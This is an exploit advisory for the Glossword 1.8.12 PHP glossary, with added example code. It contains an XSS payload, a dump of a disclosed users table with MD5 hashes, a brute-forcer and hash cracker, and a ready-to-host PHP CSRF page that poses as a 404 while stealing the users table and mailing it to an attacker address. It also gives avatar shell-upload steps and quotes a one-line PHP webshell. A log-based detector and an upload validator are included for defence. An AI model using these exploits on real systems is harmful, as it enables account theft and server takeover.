glossword 1.8.12 - Multiple Vulnerabilities

EDB-ID: 24456
CVE: (none listed)
Author: AkaStep
Type: webapps
Platform: PHP
Date: 2013-02-05


===================================================
Vulnerable Software: Glossword 1.8.12
Tested version: Glossword 1.8.12 
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/
Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.
Dork: Powered by Glossword 1.8.12 
===================================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH

===================================================
About the vulnerabilities:

XSS

Reflected XSS in the `a` parameter of gw_admin.php: the value is written back into the page unencoded, so the leading "> closes the surrounding attribute and tag and the script runs in the browser of whoever opens the link (for gw_admin.php, an administrator):

http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings

===================================================

Database backup disclosure:

Glossword writes its SQL exports inside the web root, under gw_temp/gw_export/sql_backup_<date>/, and chmods them to 777. The host's umask (0067, i.e. nothing for group or others) could never have produced those modes, so the script sets them itself:

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session
session    optional     pam_umask.so umask=0067
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S
u=rwx,g=x,o=
# NOTE 1: the backup files below are chmod'ed to 777 by the script #
# NOTE 2: the same files are reachable with plain, unauthenticated HTTP requests #

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash
total 1.1M
65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb  3 08:41 .
60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb  3 08:40 ..
65347  68K -rwxrwxrwx 1 hacker1user hacker1user  64K Feb  3 08:40 backup_gwnew_abbr_phrase.sql
65346  12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb  3 08:40 backup_gwnew_abbr.sql
65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user  402 Feb  3 08:40 backup_gwnew_auth_restore.sql
65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user  304 Feb  3 08:40 backup_gwnew_captcha.sql
65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb  3 08:40 backup_gwnew_component_actions.sql
65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb  3 08:40 backup_gwnew_component_map.sql
65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb  3 08:40 backup_gwnew_component.sql
65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb  3 08:40 backup_gwnew_custom_az_profiles.sql
65364  36K -rwxrwxrwx 1 hacker1user hacker1user  33K Feb  3 08:40 backup_gwnew_custom_az.sql
65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb  3 08:41 backup_gwnew_dict_example.sql
65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb  3 08:40 backup_gwnew_dict.sql
65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb  3 08:41 backup_gwnew_history_terms.sql
65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb  3 08:40 backup_gwnew_import_sessions.sql
65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user  326 Feb  3 08:41 backup_gwnew_map_user_to_dict.sql
65370  24K -rwxrwxrwx 1 hacker1user hacker1user  23K Feb  3 08:41 backup_gwnew_map_user_to_term.sql
65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb  3 08:40 backup_gwnew_pages_phrase.sql
65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb  3 08:40 backup_gwnew_pages.sql
65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user  485 Feb  3 08:40 backup_gwnew_search_results.sql
65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user  538 Feb  3 08:40 backup_gwnew_sessions.sql
65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb  3 08:40 backup_gwnew_settings.sql
65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user  321 Feb  3 08:40 backup_gwnew_stat_dict.sql
65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user  599 Feb  3 08:40 backup_gwnew_stat_search.sql
65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb  3 08:41 backup_gwnew_theme_group.sql
65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb  3 08:41 backup_gwnew_theme_settings.sql
65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb  3 08:41 backup_gwnew_theme.sql
65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user  908 Feb  3 08:40 backup_gwnew_topics_phrase.sql
65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user  761 Feb  3 08:40 backup_gwnew_topics.sql
65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb  3 08:40 backup_gwnew_users.sql
65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user  949 Feb  3 08:40 backup_gwnew_virtual_keyboard.sql
65375  32K -rwxrwxrwx 1 hacker1user hacker1user  29K Feb  3 09:03 backup_gwnew_wordlist.sql
65376  48K -rwxrwxrwx 1 hacker1user hacker1user  46K Feb  3 08:41 backup_gwnew_wordmap.sql


root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp


root@debian:/tmp#  wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql
--2013-02-03 09:13:17--  http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3184 (3.1K) [text/plain]
Saving to: “backup_gwnew_users.sql”

100%[======================================================================================>] 3,184       --.-K/s   in 0s

2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]

SET NAMES 'utf8';
DROP TABLE IF EXISTS `gwnew_users`;
CREATE TABLE `gwnew_users` (
  `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `login` varbinary(128) NOT NULL,
  `password` char(32) NOT NULL,
  `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `date_reg` int(10) unsigned NOT NULL DEFAULT '0',
  `date_login` int(10) unsigned NOT NULL DEFAULT '0',
  `int_items` int(10) unsigned NOT NULL DEFAULT '0',
  `user_fname` varbinary(64) NOT NULL,
  `user_sname` varbinary(64) NOT NULL,
  `user_email` varchar(255) NOT NULL,
  `user_perm` blob NOT NULL,
  `user_settings` blob NOT NULL,
  PRIMARY KEY (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;

INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',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);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
root@debian:/tmp#



In this example the file is backup_gwnew_users.sql because gwnew_ is the custom table prefix I chose; the default prefix set by the installer is gw_.

Feel free to write your own brute-forcer. The path format is:

sql_backup_<YYYY-mmMon-dd>/backup_{TABLE_PREFIX}users.sql

e.g. sql_backup_2013-02Feb-03/backup_gw_users.sql

A custom table prefix is no protection either: if directory indexing is not disabled on the target, the whole export tree is listed at

http://site.tld/gw_temp/gw_export/sql_backup_2013-02Feb-03/

and every file in it can be downloaded from there.
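The brute-forcer the text leaves to the reader, as an added example that is not part of AkaStep's advisory or of Glossword: it builds the candidate backup URLs for a date window and a list of table prefixes (the directory name follows PHP's date('Y-mM-d'), as in the exploit further down), and once a users dump is recovered it pulls out the login/hash pairs and runs a wordlist over them. The hashes are plain unsalted MD5: the `test` account's 098f6bcd4621d373cade4e832627b4f6 above is md5("test"). The base URL, prefixes, date window and wordlist are assumptions, and the sample dump is constructed from the rows shown above.

```python
"""
Added example (not AkaStep's or Glossword's code): enumerate the predictable
Glossword backup paths and pull logins/MD5 hashes out of a recovered dump.

Assumptions (not stated in the advisory): base URL, table prefixes, date
window and wordlist are the tester's guesses. Nothing touches the network
unless the script is run with --probe.
"""
import hashlib
import re
import sys
import urllib.request
from datetime import date, timedelta

# PHP's date('Y-mM-d') gives e.g. 2013-02Feb-03. 'M' is always the English
# abbreviation, so build it by hand instead of relying on a locale-dependent %b.
MONTH_ABBR = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
              "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]


def backup_dir_name(d):
    return f"sql_backup_{d.year:04d}-{d.month:02d}{MONTH_ABBR[d.month - 1]}-{d.day:02d}"


def candidate_urls(base, prefixes, start, days, table="users"):
    """All backup URLs for `days` days back from `start` (date or ISO string), per prefix."""
    if isinstance(start, str):
        start = date.fromisoformat(start)
    base = base.rstrip("/")
    urls = []
    for n in range(days):
        d = start - timedelta(days=n)
        for p in prefixes:
            urls.append(f"{base}/gw_temp/gw_export/{backup_dir_name(d)}/backup_{p}{table}.sql")
    return urls


# One dumped row of the users table starts: id, login, 32-hex MD5 of the password.
INSERT_RE = re.compile(r"INSERT INTO `\w+_users` VALUES \('\d+','([^']*)','([0-9a-f]{32})'")


def extract_accounts(dump_sql):
    return [(m.group(1), m.group(2)) for m in INSERT_RE.finditer(dump_sql)]


def crack_md5(accounts, wordlist):
    """Unsalted MD5: hashing each candidate word once covers every account."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {login: table[h] for login, h in accounts if h in table}


def probe(urls, timeout=5):
    """HEAD each candidate; return the ones answering 200 (live disclosure)."""
    found = []
    for u in urls:
        try:
            req = urllib.request.Request(u, method="HEAD")
            with urllib.request.urlopen(req, timeout=timeout) as r:
                if r.status == 200:
                    found.append(u)
        except Exception:
            pass
    return found


# Constructed sample in the shape of the dump above (hashes copied from it,
# trailing blob columns shortened).
SAMPLE_DUMP = """
INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x00);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:0:{}',0x00);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x00);
"""

if __name__ == "__main__":
    urls = candidate_urls("http://hacker1.own/glosslatest/glossword/1.8/",
                          ["gw_", "gwnew_"], "2013-02-03", days=7)
    if "--probe" in sys.argv:
        for u in probe(urls):
            print("FOUND", u)
    else:
        print("\n".join(urls))
    accounts = extract_accounts(SAMPLE_DUMP)
    print(crack_md5(accounts, ["guest", "test", "admin", "password", "123456"]))
```

Run without arguments it only prints the candidate list and cracks the constructed sample; `--probe` HEADs the candidates against the configured base URL. A 200 on any of them is the finding, no login required.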


That is not the end of it.

There is a second way to get at the dump, through a CSRF vulnerability: the maintenance action that writes the backup is a plain GET on gw_admin.php with fixed parameters and no anti-CSRF token, so a page the admin merely visits can trigger it.

Here we go (CSRF + database dump stealer):
Simply trick a logged-in admin into visiting the malicious page below.
If the attack succeeds, it silently mails you the victim's users table (logins and MD5 password hashes).



==============EXPLOIT BEGINS=====================

<?php
error_reporting(0);

/*
 * CSRF + backup-dump stealer for Glossword 1.8.12.
 * Host this page and lure a logged-in Glossword administrator to it.
 * The hidden <img> tags make the admin's browser fire the maintenance
 * requests that write the SQL export into gw_temp/gw_export/; the export
 * directory is named after the current date, e.g.
 * http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/
 */

define("TARGETSITE", 'http://hacker1.own/glosslatest/glossword/1.8/');
define("HACKERMAIL", 'hacker@g00glemail.tld');
define("STANDARDTABLEPREFIX", 'gw_');   // default prefix chosen by the installer

// Look like a harmless 404 page to the victim; the padding pushes the
// markup out to the browser early so the image requests start right away.
header('Status: 404 Not found!');
echo '<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at ' . $_SERVER['HTTP_HOST'] . ' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL, 500);

// Trigger the backup export with the victim's admin session (w2=1..7).
for ($i = 1; $i < 8; $i++) {
    echo '<img src="' . rtrim(TARGETSITE, '/') . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" height="0" width="0" />' . PHP_EOL;
}
flush();

// The export lands in a world-readable, web-accessible directory named after today's date.
// Note: this fetch races the victim's browser; the files must exist before it runs.
$data = rtrim(TARGETSITE, '/') . '/gw_temp/gw_export/sql_backup_' . date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX . 'users.sql';

$s = file_get_contents($data);
/* uncomment to keep a copy on this server: file_put_contents(md5(rand(1,1000)) . '.txt', $s); */

// Mail the users table (logins + MD5 password hashes) to the attacker.
@mail(HACKERMAIL, 'Hello xDuMpS!', 'CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) . PHP_EOL);

exit;
?>


================EXPLOIT ENDS HERE======================
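What the exploit above leaves behind in the web server log, and how to spot it, as an added example that is not part of the advisory: the admin's browser requests gw_admin.php?a=maintenance with a Referer from the attacker's host (or none at all), and shortly after, a second client fetches a file under gw_temp/gw_export/. The detector below runs both rules over Apache combined-format lines. The log format, the site hostname and the sample lines are assumptions constructed for this example.

```python
"""
Added example, not part of AkaStep's advisory: flag the two traces the CSRF
exploit leaves in an Apache combined access log.

  csrf_maintenance : gw_admin.php?a=maintenance requested with a Referer from
                     another host (high confidence) or with no Referer (medium)
  backup_fetch     : anything under gw_temp/gw_export/ fetched over HTTP

Assumptions: combined log format, the site's own hostname is known, and the
sample lines below are constructed (203.0.113.5 = attacker server,
198.51.100.7 = the administrator's workstation).
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, site_host):
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        parts = urlsplit(rec["path"])
        query = parse_qs(parts.query)

        # Rule 1: the export directory should never be fetched directly. A
        # legitimate admin download also matches, so correlate with sessions.
        if "/gw_temp/gw_export/" in parts.path:
            hits.append({"rule": "backup_fetch", "confidence": "high",
                         "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"]})

        # Rule 2: the maintenance action reached from outside the site (CSRF pattern).
        if parts.path.endswith("/gw_admin.php") and query.get("a") == ["maintenance"]:
            ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
            if ref_host is None:
                conf = "medium"      # Referer suppressed or absent
            elif ref_host.lower() != site_host.lower():
                conf = "high"        # request originated on another origin
            else:
                conf = None          # same-site: normal admin use
            if conf:
                hits.append({"rule": "csrf_maintenance", "confidence": conf,
                             "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "referer": rec["referer"]})
    return hits


# Constructed sample: line 1 is the admin's browser driven by the attacker's page,
# line 2 the attacker's server collecting the dump, lines 3-4 normal admin use.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Feb/2013:09:12:41 +0000] "GET /glosslatest/glossword/1.8/gw_admin.php?a=maintenance&t=settings&w1=8&w2=1&w3= HTTP/1.1" 200 512 "http://evil.example/404.html" "Mozilla/5.0"
203.0.113.5 - - [03/Feb/2013:09:12:44 +0000] "GET /glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gw_users.sql HTTP/1.1" 200 3184 "-" "PHP/5.3"
198.51.100.7 - - [03/Feb/2013:09:15:00 +0000] "GET /glosslatest/glossword/1.8/gw_admin.php?a=maintenance&t=settings&w1=8&w2=1&w3= HTTP/1.1" 200 512 "http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?t=settings" "Mozilla/5.0"
198.51.100.7 - - [03/Feb/2013:09:16:00 +0000] "GET /glosslatest/glossword/1.8/index.php?a=list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for h in analyze(SAMPLE_LOG.splitlines(), "hacker1.own"):
        print(h["rule"], h["confidence"], h["ip"], h["ts"], h["path"])
```

The same-site maintenance request on line 3 is deliberately left alone: the rule keys on origin, not on the action itself, so an administrator running a backup from the UI does not page anyone.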

Now the shell upload (requires administrative access to the site).
Once in the admin panel (e.g. via the XSS above, or with a password cracked from the disclosed users table), go to:

http://site.tld/gw_admin.php?a=edit-own&t=users

and upload your shell through the Avatar settings tab.
Ignore the notice "The following file types are allowed: jpg, png": it is not enforced.
Watch where the uploaded file is stored (see the screenshot), request it directly, and you have your shell.

http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png
Backup image: http://oi47.tinypic.com/crsde.jpg
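The check the avatar upload is missing, as an added example that is not Glossword's code; it is written in Python (the same language as the other added examples on this page) rather than PHP. The allowlist is enforced on the last extension and on the file's magic bytes, double extensions are rejected outright, and the client's filename is never reused for storage. The size limit, the signature table and the test inputs are assumptions.

```python
"""
Added example, not Glossword's code: an avatar upload check that actually
enforces "jpg, png only".

 - the extension is taken from the LAST dot and must be in the allowlist
 - the content must start with that format's magic bytes (a .png that
   begins with "<?php" is rejected)
 - names with more than one dot are rejected: some Apache AddHandler
   configurations execute anything with ".php" anywhere in the name
 - the stored name is random, so the uploader never controls the served path
"""
import os
import secrets

# extension -> magic-byte prefixes an honest file of that type starts with
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
MAX_BYTES = 512 * 1024   # assumed limit for an avatar


def validate_avatar(client_name, data):
    """Return (True, storage_name) on success or (False, reason) on rejection."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    base = os.path.basename(client_name.replace("\\", "/"))   # drop any path component
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        return False, f"content is not a {ext} image"
    return True, f"avatar_{secrets.token_hex(16)}.{ext}"


# Constructed test inputs: a minimal PNG header and a PHP payload.
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
JPG = b"\xff\xd8\xff" + b"\x00" * 16
SHELL = b"<?php system($_GET['c']); ?>"

if __name__ == "__main__":
    for name, blob in [("me.png", PNG), ("shell.php", SHELL),
                       ("shell.php.png", PNG), ("fake.png", SHELL),
                       ("../../x.jpg", JPG)]:
        print(name, validate_avatar(name, blob))
```

Checking magic bytes alone is not enough either: a valid PNG with PHP appended still starts with the right signature, which is why the extension rule and the random storage name are kept alongside it.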



================================================
                   KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep